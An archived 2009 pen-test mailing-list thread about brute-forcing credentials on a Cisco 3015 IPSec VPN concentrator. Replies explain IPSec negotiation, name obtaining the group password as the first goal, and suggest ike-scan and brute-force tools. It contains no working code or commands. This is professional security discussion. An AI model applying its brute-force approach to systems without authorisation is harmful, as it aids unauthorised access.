From: Richard Miles (richard.k.milesgooglemail.com)
Date: Fri Mar 13 2009 - 14:05:28 CDT

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi Alex,

Yes, I know the group name (well, I guess I know, since most companies
intend to use the own company name as group name).

What you mean by ike-scan is the right way to approach it? Can you
give me a example?

Thanks.

On Fri, Mar 13, 2009 at 3:08 PM, Alex Eden <Alex.Edensenet-int.com> wrote:
> Do you have the group password?
>
> Well, that's your first objective - to get the group password. Without the
> group password the rest is meaningless. I assume you know the group name,
> right? Ike-scan is the right way to approach it.
>
>
> -----Original Message-----
> From: listbouncesecurityfocus.com [mailto:listbouncesecurityfocus.com] On
> Behalf Of Richard Miles
> Sent: Tuesday, March 10, 2009 11:54 AM
> To: aditya mukadam; derek.chamorrogmail.com; David.Howeansgroup.co.uk
> Cc: pen-testsecurityfocus.com
> Subject: Re: Cisco 3015 concentrator VPN bruteforce? And proxy with easy
> header rewrite?
>
> Hi aditya, Derek and David,
>
> Thanks for all your reply.
>
> Aditya, well, at the end, what I really need is a tool able to
> brute-force user/password at this uncommon Cisco vpn concentrator.
> Someone know a tool for that?
>
> I'm thinking in look for a linux client and do a ugly shell-script to
> connect and do a brute force, however it will be very slow. So if
> there is a reliable solution, it should be much better. Also, I'm not
> sure if this Cisco VPN by default lock accounts. Anyone have more
> experience?
>
> I did found a old message where someguys pointed a flaw where was
> possible to enumerate usernames from this cisco vpn, but it for sure
> was not encapsulated like mine. No results for me, and also, it had
> been patched in the last 3 years.
>
> Derek, thanks for the link, however the target do not have the web
> interface and also I'm not allowed to do any DoS attack.
>
> David, yes, I'm sure it's TCP.
>
> Thank you all.
>
> On Tue, Mar 10, 2009 at 6:57 AM, aditya mukadam
> <aditya.mukadamgmail.com> wrote:
>> Richard,
>>
>> Based on my personal experience with Cisco Concentrator, the result
>> you received is pretty much expected.
>>
>> Quick Question: What are you exactly trying to achieve ? Brute force
>> to get what/which info ?
>>
>> As you would know, Security Associations(SA) are created by the VPN
>> Gateway during  IPSec negotiation/connection. The Phase 1 SA is ISAKMP
>> while the Phase 2 SAs are IPSEC (bi-directional). The actual traffic
>> is encrypted with protocol ESP or encapsulated with AH ( not used
>> nowadays). Packet is encapsulated in TCP 10000 after the IPSec
>> connection successfully establishes.
>>
>> Insight to Cisco Concentrator. Its capable of:
>> 1) Site to site IPSec VPN
>> 2) Remote Access IPSec VPN Gateway
>> 3) WebVPN (SSL VPN)
>> Lemme know if you need more info.
>>
>> Hope this helps.
>>
>> Thanks,
>> Aditya Govind Mukadam
>>
>>
>>
>> On Tue, Mar 10, 2009 at 3:00 AM, Richard Miles
>> <richard.k.milesgooglemail.com> wrote:
>>> Hello
>>>
>>> I'm doing a pen-test in a Cisco 3015 concentrator - ipsec connections
>>> tunneled over TCP port 10000.
>>>
>>> By the way, ike-scan do not work with this vpn. Also the common tools
>>> to brute force like THC-pptp, THC-Hydra and Medusa do not work also.
>>>
>>> Nmap neither regoganize the port as opened (but it doesn't matter), it
>>> say filtered, but I can telnet and estabilish a connection to it.
>>>
>>> Do you have some experience with this device? Can you give me some
>>> hints? And point me to some tools for identify, enumerate and
>>> brute-force this Cisco implementation?
>>>
>>> A bit off-topic: Does anyone know a easy to install and configure web
>>> proxy for windows which enable headers rewrite? I need to setup a fast
>>> web proxy at my windows box to replace all headers (before they are
>>> sent to the webserver) of the "Cookie" field and a proprietary header.
>>>
>>> Thanks folks.
>>>
>>>
>>>
>>
>
>
>

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]